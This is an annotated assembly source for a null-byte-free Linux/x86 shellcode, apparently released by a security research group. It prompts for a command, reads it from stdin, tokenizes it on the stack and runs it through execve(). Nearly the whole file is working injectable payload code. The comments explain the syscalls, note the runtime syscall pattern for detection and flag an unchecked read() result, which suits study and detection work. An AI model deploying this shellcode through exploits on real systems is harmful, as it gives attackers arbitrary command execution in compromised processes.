# XCHG Research Group
# Linux/x86 execve read shellcode - 92 bytes
#
#
# )--[ Written by 0ut0fbound ]--(
#
# - http://outofbound.host.sk
# - http://xchglabs.host.sk
# Target: Linux/i386, GAS AT&T syntax, raw int $0x80 ABI
#   (eax = syscall number, args in ebx, ecx, edx; result in eax).
# Overall flow: write a prompt to stdout, read one line from stdin
# into a stack buffer, split it on spaces into an argv[] built on
# the stack, then execve() it and exit. No libc and no .data section:
# every string lives on the stack, and the xor/movb/inc idioms keep
# the encoded instruction bytes free of 0x00.
# For analysis/detection: the observable syscall sequence is
# write(1, ...) -> read(0, ...) -> execve(<stdin-derived path>, ...)
# -> exit(0), with the execve pathname and argv[] assembled at runtime
# from untrusted input.
.text
.globl _start
_start:
# --- write(1, "Command: ", 9) ---
# EAX = 0x04 -> syscall write()
xorl %eax, %eax
movb $0x4, %al
# EBX = 1 -> fd stdout
xorl %ebx, %ebx
inc %ebx
# Build the prompt on the stack, last dword first (little-endian):
#   0x6d6d6f43 = "Comm", 0x3a646e61 = "and:", 0x20202020 = "    "
pushl $0x20202020
pushl $0x3a646e61
pushl $0x6d6d6f43
# ECX = esp (start of the string), EDX = 9 -> only "Command: " is written
movl %esp, %ecx
xorl %edx, %edx
movb $0x9, %dl
int $0x80
# --- n = read(0, buf, 32) ---
# EAX = 0x03 -> syscall read()
xorl %eax, %eax
movb $0x3, %al
# EBX = 0 -> fd stdin; EBX is not touched again until it is reused
# as the source of zero bytes for the NUL store below
xorl %ebx, %ebx
# EDX = 0x20 -> reserve 32 bytes below esp as the input buffer, ECX = buf
xorl %edx, %edx
movb $0x20, %dl
subl %edx, %esp
movl %esp, %ecx
int $0x80
# --- terminate the line ---
# buffer[read(0, buffer, sizeof(buffer))] = 0;
# ECX = buf + n - 1 (the last byte read, typically the '\n' when the
# input is a terminal line); storing the 32-bit EBX (= 0) overwrites
# it and the following three bytes, so buf[n-1..n+2] = 0.
# NOTE(review): the read() result is not checked. If n is 0 (EOF) or
# -errno, the store lands below buf and the loop count below is wrong
# (with ECX = 0, `loop` wraps to 2^32 iterations). With n == 32 the
# store also spills 3 bytes past the 32-byte area into the prompt
# bytes pushed above it — harmless here, but visible when reading the
# stack in a debugger.
addl %eax, %ecx
dec %ecx
movl %ebx, (%ecx)
# --- tokenize: walk the buffer backwards, pushing argv[] entries ---
# EBX = buf + n (points at the NUL just written), ECX = n (loop count),
# EDX = 0 -> push the argv[] NULL terminator. EDX is left at 0 so it
# also serves as envp for execve() below.
movl %esp, %ebx
addl %eax, %ebx
movl %eax, %ecx
xorl %edx, %edx
push %edx
LOOP1:
# AL = *ebx; only a space (0x20) is treated as a separator
movb (%ebx), %al
cmp $0x20, %al
jne CONT
# Space: 0x20 ^ 0x20 = 0 turns it into a NUL in place, then the
# address of the byte after it (start of the next token) is pushed
# as an argv[] entry. Tokens are pushed last-to-first, so the final
# argv[] on the stack is in command-line order.
xorb $0x20, (%ebx)
inc %ebx
pushl %ebx
dec %ebx
CONT:
# Visits buf+n down to buf+1; buf itself is never examined because it
# is the start of argv[0]. Consecutive spaces yield empty-string
# argv[] entries.
dec %ebx
loop LOOP1
# --- execve(buf, argv, NULL) ---
# After the loop EBX = buf -> pushed as argv[0] and used as the
# pathname; ECX = esp -> argv[]; EDX is still 0 -> envp = NULL
push %ebx
movl %esp, %ecx
# EAX = 0x0b -> syscall execve()
xorl %eax, %eax
movb $0xb, %al
int $0x80
# --- exit(0); only reached if execve() returned (i.e. failed) ---
# EAX = 0x01 -> syscall exit
xorl %eax, %eax
inc %al
xorl %ebx, %ebx
int $0x80